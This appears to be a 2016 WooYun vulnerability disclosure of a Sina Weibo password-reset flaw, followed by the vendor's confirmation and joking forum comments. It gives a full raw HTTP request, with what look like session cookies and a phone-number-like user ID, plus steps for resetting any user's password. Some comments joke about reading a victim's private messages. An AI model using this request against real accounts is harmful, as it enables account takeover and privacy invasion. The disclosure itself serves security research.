新浪微博设计缺陷导致继续重置任意用户密码（狗哥大号躺枪）

邮箱找回密码 修改密码的链接如下：https://security.weibo.com/iforgot/setpwd?rand=xxx&v=xxx

修改密码的最后一步没有用到链接中的v参数

POST /iforgot/ajsetpwd HTTP/1.1
 Host: security.weibo.com
 Connection: keep-alive
 Content-Length: 83
 Accept: */*
 Origin: https://security.weibo.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 DNT: 1
 Referer: https://security.weibo.com/iforgot/setpwd?rand=0368de8e6293fb188499986b2edc9747&v=6648f5b10e98fabc1f8f3ea487a40d1d
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
 Cookie: SINAGLOBAL=7621946109630.549.1458865578638; _s_tentry=wooyun.org; Apache=1577074479587.3948.1459154671768; ULV=1459154671823:2:2:1:1577074479587.3948.1459154671768:1458865578645; login_sid_t=af37df78d736a242c763e2765c89f691; WBStore=8b23cf4ec60a636c|undefined; un=18210058035; appkey=; SUHB=0pHxOfeAwXoecI; myuid=5890029338; SUB=_2AkMhpwLbdcPhrAZZkfgVzmLhb4VMywv0utX3NUbeEiczHBt_7j5nqSVohkN_Xd6h2GMktgHeKhkm5VWCoP0X1mfvQ3QV; SUBP=0033WrSXqPxfM72wWs9jqgMF55529P9D9W5zh7Ab4-USV8-gMNpxAHcX5JpVF020ehe0So-Reo-X; UOR=,,www.wooyun.org
 AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
 
 p=ceshi123&rand=51b956f1568d0996cb60a1cb9370f9c5&randcode=0&entry=weibo&p1=ceshi123

而rand可在邮箱找回密码的过程中获取

利用步骤

1、找回密码，选择通过邮箱找回，一直走到向邮箱发送邮件的步骤

2、用找回密码过程中获取到的rand替换上面数据包中的rand，即可直接修改目标微博账号密码

狗哥躺枪

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-01 14:54

厂商回复：

感谢关注新浪安全，问题修复中。

最新状态：

暂无

1. 2016-03-31 12:03 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

   2

   @疯狗 还有大号？

   1# 回复此人

2. 2016-03-31 12:04 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

   2

   @sqlfeng

   2# 回复此人

3. 2016-03-31 12:15 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

   1

   @疯狗

   3# 回复此人

4. 2016-03-31 12:21 | 孤梦° ( 普通白帽子 | Rank:149 漏洞数:51 )

   1

   前排

   4# 回复此人

5. 2016-03-31 12:33 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

   1

   。。。。。。。 放开我，还个孩纸啊

   5# 回复此人

6. 2016-03-31 12:36 | sqlfeng ( 普通白帽子 | Rank:721 漏洞数:86 | 江山父老能容我,不使人间造孽钱)

   1

   被你先了一步..

   6# 回复此人

7. 2016-03-31 12:38 | king7 ( 普通白帽子 | Rank:1902 漏洞数:253 | 早知如此绊人心，何如当初莫相识。)

   1

   这么说可以查看狗哥和妹子的私信了???

   7# 回复此人

8. 2016-03-31 12:42 | zsmj ( 普通白帽子 | Rank:243 漏洞数:34 | 蛛丝马迹！)

   1

   真会玩，有考虑过狗哥的感受么？

   8# 回复此人

9. 2016-03-31 13:50 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了，还要自由干吗？)

   1

   @疯狗 还有大号？

   9# 回复此人

10. 2016-03-31 13:58 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    1

    还有这漏洞 哈哈 我也去测测

    10# 回复此人

11. 2016-03-31 14:30 | yzy9952 ( 实习白帽子 | Rank:64 漏洞数:10 | yzy9952)

    1

    mark

    11# 回复此人

12. 2016-03-31 15:09 | linkey ( 实习白帽子 | Rank:89 漏洞数:38 | sqlmap的超爱好者)

    2

    还来 …又是一炮

    12# 回复此人

13. 2016-03-31 15:54 | 小红猪 ( 普通白帽子 | Rank:341 漏洞数:62 | little red pig!)

    1

    牛逼，求带

    13# 回复此人

14. 2016-03-31 16:23 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

    1

    66666

    14# 回复此人

15. 2016-04-01 08:40 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    2

    66666

    15# 回复此人

16. 2016-05-17 09:33 | tSt ( 普通白帽子 | Rank:109 漏洞数:30 | 在开发里运维最强，运维里网络最强，网络里...)

    0

    怎么搜不到sneak？

    16# 回复此人